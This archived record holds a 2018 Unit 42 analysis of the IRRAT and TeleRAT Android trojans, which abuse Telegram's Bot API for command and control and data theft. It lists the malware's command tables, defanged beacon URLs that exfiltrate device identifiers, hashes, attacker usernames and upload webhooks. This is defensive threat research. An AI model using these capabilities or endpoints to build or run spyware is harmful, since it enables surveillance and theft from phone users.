{
	"id": "f05e00c7-7a61-45fd-85f3-3b609c3484c6",
	"created_at": "2026-04-06T00:19:28.695418Z",
	"updated_at": "2026-04-10T13:12:25.935389Z",
	"deleted_at": null,
	"sha1_hash": "ab81e2e225d3aae93d5e9f25c30613f813834015",
	"title": "TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1431471,
	"plain_text": "TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API\r\nto Target Iranian Users\r\nBy Ruchna Nigam, Kyle Wilhoit\r\nPublished: 2018-03-20 · Archived: 2026-04-05 15:32:12 UTC\r\nSummary\r\nTelegram Bots are special accounts that do not require an additional phone number to setup and are generally used\r\nto enrich Telegram chats with content from external services or to get customized notifications and news. And\r\nwhile Android malware abusing Telegram's Bot API to target Iranian users is not fresh news (the emergence of a\r\nTrojan using this method called IRRAT was discussed in June and July 2017), we set out to investigate how these\r\nTelegram Bots were being abused to command and control malicious Android applications.\r\nThis blog details our findings navigating through some Operational Security (OPSEC) fails while sifting through\r\nmultiple malicious APK variants abusing Telegram's Bot API; including the discovery of a new Trojan we've\r\nnamed “TeleRAT”. TeleRAT not only abuses Telegram's Bot API for Command and Control (C2), it also abuses it\r\nfor data exfiltration, unlike IRRAT.\r\nWhat We Already Know- IRRAT\r\nBased on previous reports, we know Telegram's Bot API was already being employed by attackers to steal\r\ninformation ranging from SMS and call history to file listings from infected Android devices. The majority of the\r\napps we saw disguise themselves as an app that tells you how many views your Telegram profile received –\r\nneedless to say, the information provided is inaccurate as Telegram doesn’t allow for populating any such\r\ninformation.\r\nWe continue to see IRRAT active in the wild to this date.\r\nWe used the below sample for this analysis.\r\nSHA256 1d0770ac48f8661a5d1595538c60710f886c254205b8cf517e118c94b256137d\r\nTeleRAT works by creating and then populating the following files on the phone’s SD Card and sending them to\r\nthe upload server, after the app’s first launch:\r\n“[IMEI] numbers.txt”: Contact information\r\n“[IMEI]acc.txt”: List of Google accounts registered on the phone\r\n“[IMEI]sms.txt”: SMS history\r\n1.jpg: Picture taken with the front-facing camera\r\nImage.jpg: Picture taken with back-facing camera\r\nFinally, it reports back to a Telegram bot (identified by a bot ID hardcoded in each RAT’s source code) with the\r\nbelow beacon, and the application icon is then hidden from the phone's app menu:\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 1 of 12\n\nhxxp://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]?text=جدید نصب\\n [IMEI] \\nIMEI : :\r\n[IMEI]\\nAndroid ID : [AndroidID]\\nModel : [PhoneModel]\\n[IP] \\n\\nIMEI دستگاه:] IMEI]\r\nIn the background, the app continues to beacon to the Telegram bot at regular intervals and listens for certain\r\ncommands, as detailed below.\r\nCommand Action Communication to Telegram bot\r\ncall@[IMEI]@[Number]\r\nPlaces a call to\r\n[Number]\r\nhxxps://api.telegram.org/bot[APIKey]/sendmessage?\r\nchat_id=[ChatID]\u0026text=call with [Number]\r\nsms@[IMEI]@[Number]@[Text]\r\nSMS [Text] to\r\n[Number]\r\nhxxps://api.telegram.org/bot[APIKey]\r\n/sendmessage?chat_id=[ChatID]\u0026text=sent\r\ngetapps@[IMEI]\r\nSaves a list of\r\ninstalled apps to\r\nSD Card to file\r\nnamed  “[IMEI]\r\napps.txt\", uploads\r\nto upload server\r\nNone\r\ngetfiles@[IMEI]@[DirPath]\r\nRetrieves file\r\nlisting from\r\n[DirPath], saves to\r\nSD Card as\r\n“[IMEI]files.txt”,\r\nuploads to server\r\nNone\r\ngetloc@[IMEI]\r\nStarts a GPS\r\nlistener that\r\nmonitors location\r\nchanges\r\nNone\r\nupload@[IMEI]@[FilePath]\r\nUploads file at\r\n[FilePath]\r\nNone\r\nremoveA@[IMEI]@[FilePath on\r\nSDCard]\r\nDeletes file at\r\n[FilePath on\r\nSDCard]\r\nhttps://api.telegram.org/bot[APIKey]/sendmessage?\r\nchat_id=[ChatID]\u0026text= ______________[FilePath\r\non SDCard]\r\nremoveB@[IMEI]@[DirPath on\r\nSDCard]\r\nDeletes [DirPath\r\non SDCard]\r\nNone\r\nlstmsg@[IMEI] Saves SMS history\r\nto SD Card as\r\nNone\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 2 of 12\n\n”[IMEI]lstmsg.txt”,\r\nuploads to server\r\nyehoo@[IMEI]\r\nTakes a picture\r\nwith Front Camera,\r\nsaves to SD Card\r\nas “yahoo.jpg”,\r\nuploads to server\r\nNone\r\nTable 1: List of IRRAT bot commands\r\nAs the table above shows, this IRRAT sample makes use of Telegram's bot API solely to communicate commands\r\nto infected devices. The stolen data is uploaded to third party servers, several of which employ a webhosting\r\nservice. Fortunately for us, these servers had several OPSEC fails. More on that further below.\r\nA New Family- TeleRAT\r\nWhile sifting through IRRAT samples, using AutoFocus, we came across another family of Android RATs\r\nseemingly originating from and/or targeting individuals in Iran that not only makes use of the Telegram API for\r\nC2 but also for exfiltrating stolen information.\r\nFigure 1: pivoting in autofocus for applications using the Telegram bot API\r\nWe named this new family “TeleRAT” after one of the files it creates on infected devices.\r\nWe used the below sample for this analysis.\r\nSHA256 01fef43c059d6b37be7faf47a08eccbf76cf7f050a7340ac2cae11942f27eb1d\r\nPost-installation TeleRAT creates two files in the app’s internal directory:\r\ntelerat2.txt containing a slew of information about the device - including the System Bootloader version\r\nnumber, total and available Internal and External memory size, and number of cores.\r\nthisapk_slm.txt mentioning a Telegram channel and a list of commands. We investigate this Telegram\r\nchannel is greater detail further below.\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 3 of 12\n\nThe RAT announces its successful installation to the attackers by sending a message to a Telegram bot via the\r\nTelegram Bot API with the current date and time.\r\nMore interestingly, it starts a service that listens for changes made to the Clipboard in the background.\r\nFigure 2: Code snippet that listens for clipboard changes\r\nFinally, the app fetches updates from the Telegram bot API every 4.6 second, listening for the following\r\ncommands (we used Google Translate for the below Farsi (Persian) translations):\r\n \r\nCommand Translation\r\ncontacts Get دریافت مخاطبین\r\nclipboard the Get دریافت کلیپ بورد\r\nClipboard set:[text]\r\nlocation Get دریافت مکان\r\ninformation charging Receive دریافت اطالعات شارژ\r\nAll file list:/[path]\r\nRoot file list:/[path]\r\napps Get دریافت برنامه ها\r\n1Downloadfile/[filename]\r\n2Downloadfile/[filename]\r\nCreateContact/[name]/[number]\r\nSetWallpaper http[URL]\r\nmessages) SMS (Receive دریافت پیام ها\r\nSendsmsfor/[destination]/[text]\r\nMessageShow[text]\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 4 of 12\n\n1عکس گرفنت Take photo 1 (front camera)\r\n2عکس گرفنت Take photo 2 (back camera)\r\nstatus Get دریافت وضعیت\r\ncalls Receive دریافت تماس ها\r\nDeleteDir[dirname]\r\nسایلنت Silent (set to Vibrate mode)\r\nصدادار Loud (set to normal Ringer mode)\r\nبیصدا Silent (set to Silent mode)\r\nBlacksc Blacks out phone screen\r\nBlackscf Clears black screen\r\nضبط فیلم\r\nAudio recording (saves recorded audio to AUDIO123/MUSIC/rec123.m4a\r\non SD Card)\r\nrecording audio Stop توقف ضبط فیلم\r\nدستورات راهنمای Instruction manual (Help Menu)\r\ncall to [number]\r\nRESET\r\n(deletes thisapk_slm.txt and sends a new registration message to Telegram\r\nbot)\r\nدریافت گالری\r\nGet gallery (sends files from the /Dcim folder on the SD Card to Telegram\r\nbot)\r\nDelete app files or گالری دریافت\r\nVibrate [x]\r\n(Causes phone to vibrate for x seconds, with a maximum value of 600\r\nsecs)\r\nکم لرزش Low vibration (for a duration of 150 secs)\r\nمتوسط لرزش Medium vibration (350 secs)\r\nزیاد لرزش Shake too much (600 secs)\r\nTable 2: List of TeleRAT bot commands\r\nAside from additional commands, this new family’s main differentiator to IRRAT is that it also uploads exfiltrated\r\ndata using Telegram's sendDocument API method.\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 5 of 12\n\nFigure 3: Code snippet showing the use of the SendDocument Telegram bot API method\r\nTeleRAT is an upgrade from IRRAT in that it eliminates the possibility of network-based detection that is based on\r\ntraffic to known upload servers, as all communication (including uploads) is done via the Telegram bot API.\r\nHowever, it still leaves other doors open via Telegram's bot API, since the API Keys are hardcoded in the APKs.\r\nThe API allows fetching updates by two means:\r\n1.The getUpdates method: Using this exposes a history of all the commands that were sent to the bot, including\r\nusernames from which the commands originated. From the bots that were still responding and had an update\r\nhistory (incoming updates are only kept for 24 hours as per Telegram's policy), we were able to find bot\r\ncommands originating from four Telegram accounts, shown below.\r\nFigure 4: Telegram usernames revealed from bot command histories\r\n2. Using a Webhook: Telegram allows redirecting all bot updates to a URL specified by means of a Webhook.\r\nTheir policy limits these Webhooks to HTTPS URLs only. While most of the Webhooks we found used\r\ncertificates issued by Let’s Encrypt with no specific registrar information, some of them led us back to the world\r\nof third party webhosting and open directories. Let’s Encrypt has been notified about this activity.\r\nA sample of only a few Webhooks we found are shown below. hxxps://mr-mehran[.]tk/pot/Bot/ in particular\r\nappears to be hosting close to 6500 bots, however, we can’t confirm whether they’re all used for malicious\r\npurposes.\r\nFigure 5: Webhooks found associated with some TeleRAT bots\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 6 of 12\n\nOPSEC Fails, Distribution Channels \u0026 Attribution\r\nIn our research we were able find what was clearly an image of the botmaster testing out the RAT, based on the\r\nTelegram bot interface that can be seen on the monitor pictured in the lower half of Figure 6.\r\nFigure 6: Image of botmaster testing out the RAT\r\nWe were also able to find exfiltrated messages that confirmed our theory about the test run and reveals a thread in\r\nPersian Farsi seemingly discussing bot setup.\r\n“صبح ساعت ۶ انالین شو تا روباته رو امتحان کنیم”\r\nGoogle Translation: “Morning 6 hours online to try the robotage”\r\nWhile investigating attribution for TeleRAT, we noticed the developers made no effort to hide their identities in\r\nthe code. One username is seen in the screenshot below.\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 7 of 12\n\nFigure 7: Telegram channel advertised in source code\r\nLooking further into the ‘vahidmail67’ Telegram channel, we found advertisements for applications and builders\r\nthat ran the entire gamut - from applications that get you likes and followers on Instagram, to ransomware, and\r\neven the source code for an unnamed RAT (complete with a video tutorial, shown below).\r\nFigure 8: Screenshot from a Telegram channel advertising \u0026 sharing a RAT source code\r\nAside from the Telegram channel, while looking for references to certain TeleRAT components we stumbled upon\r\nsome threads on an Iranian programmers’ forum advertising the sale of a Telegram bot control library. The forum\r\nis frequented by some of the developers whose code is heavily reused in a big portion of the TeleRAT samples we\r\ncame across.\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 8 of 12\n\nFigure 9: Advertisement for sale of a Telegram bot control library\r\nThe forum goes the extra mile to mention all content is in accordance with Iran's laws. However, it's hard to see\r\nany non-malicious use for some of the code advertised there or written by developers that frequent it – for\r\ninstance, a service that runs in the background listening for changes to the Clipboard (pictured in the code snippet\r\nin Figure 3 further above).\r\nFigure 10: Forum Disclaimer\r\nOverall, TeleRAT pieces together code written by several developers, however, due to freely available source code\r\nvia Telegram channels and being sold on forums, we can’t point to one single actor commanding either IRRAT or\r\nTeleRAT and it appears to be the work of several actors possibly operating inside of Iran.\r\nVictimology\r\nAs we investigated these RATs, we also started looking at how victims were getting infected. Further\r\ninvestigating, we witnessed several third-party Android application stores distributing seemingly legitimate\r\napplications like \"Telegram Finder\", which supposedly helps users locate and communicate with other uses with\r\nspecific interests, like knitting. Also, we've witnessed several samples distributed and shared via both legitimate\r\nand nefarious Iranian Telegram channels.\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 9 of 12\n\nFigure 11: leIranian third-party application store\r\nLooking closer at the malicious APKs we were able to get an understanding of common application naming\r\nconventions and functionality across the board.\r\nFigure 12: 'Telegram finder' application\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 10 of 12\n\nBased on the samples we analysed, the three most common application names for both IRRATand TeleRAT are:\r\nNative App Name Translated App Name\r\nCheer Profile پروفایل چکر\r\nFinder Telegram بازدید یاب تلگرام\r\ntelegram hacker N/A\r\nAdditionally, there were several malicious APKs disguised as fake VPN software and/or configuration files, such\r\nas \"atom vpn\" and \"vpn for telegram.\r\nThere appears to be a total identified victim count of 2,293 at the time of writing, based on the infrastructure we\r\nanalysed. There appears to be a rather small range of geographically dispersed victims, with 82% of having\r\nIranian phone numbers.\r\nIran 1894\r\nPakistan 10\r\nIndia 227\r\nAfghanistan 109\r\nUnited Kingdom 53\r\nThere may also be additional infrastructure or variants we were unaware of at the time of writing. That said, the\r\nnumber of victims likely residing within Iran far exceeds the victim count for any other country.\r\nConclusion\r\nPart of dissecting and understanding new threats involve looking closer at already established campaigns and\r\nmalware variants. This is a perfect example of just that; looking closer at a previously established malware family\r\nto better understand it's current and possibly changed capabilities.\r\nWhile malware leveraging the Telegram bot API is not necessarily new, we were able to identify a new family,\r\nTeleRAT, hiding entirely behind Telegram's API to evade network-based detection and exfiltrate data. Leveraging\r\nintelligence from AutoFocus, accessible attacker infrastructure, and other open source intelligence we were able to\r\npaint an accurate picture of an ongoing operation leveraging Telegram's API and targeting users via third party\r\napplication sites and social media channels.\r\nTaking some basic precautions can help users protect themselves from malicious applications like TeleRAT, such\r\nas:\r\nAvoid third-party application stores or sources.\r\nDon't allow application sideloading on your device.\r\nEnsure the application you are installing is official, regardless of source.\r\nClosely review and scrutinize application permission requests prior to installation.\r\nPalo Alto Networks customers are protected from this threat by:\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 11 of 12\n\n1. WildFire detects all TeleRAT and IRRAT files with malicious verdicts.\r\n2. AutoFocus customers can track these samples with the IRRAT and TeleRAT\r\n3. Traps blocks all of the APK files associated with TeleRAT and IRRAT.\r\nAPPENDIX\r\nTelegram usernames found commanding IRRAT or TeleRAT\r\nAhmad_ghob\r\nMy_LiFe_M_a_H_s_A\r\nmmm1230a\r\nWebooks\r\nhxxps://mr-mehran.tk/pot/Bot/robotcreat2_bot/Bot/Ejsahahbot/\r\nhxxps://ib3.ibot24.com/394083/\r\nhxxps://rr5.000webhostapp.com/upload_file.php\r\nhxxps://gold.teleagent.ir/bnrdehisaz/index.php\r\nhxxps://shahin-soori.ir/bots/rat/upload_file.php\r\nhxxps://mbosoba.000webhostapp.com/upload_file.php\r\nhxxps://abolking.000webhostapp.com/upload_file.php\r\nhxxps://botmohsan-apk.000webhostapp.com/Bot/bot.php\r\nhxxps://androydiha.ir/bot/Bot/hackelmi_bot/index.php\r\nhxxps://hamidhamid954321.000webhostapp.com/Bot/bot.php\r\nhxxps://mohsan024024.000webhostapp.com/upload_file.php\r\nhxxps://09152104574nazimilad.000webhostapp.com/ساز ربات/CreateBotAll.php\r\nhxxps://darkforceteam.000webhostapp.com/SmartAccounts_Bot/bots/Ratjadidebot/index.php\r\nSource: https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-irani\r\nan-users/\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
	],
	"report_names": [
		"unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users"
	],
	"threat_actors": [],
	"ts_created_at": 1775434768,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ab81e2e225d3aae93d5e9f25c30613f813834015.pdf",
		"text": "https://archive.orkl.eu/ab81e2e225d3aae93d5e9f25c30613f813834015.txt",
		"img": "https://archive.orkl.eu/ab81e2e225d3aae93d5e9f25c30613f813834015.jpg"
	}
}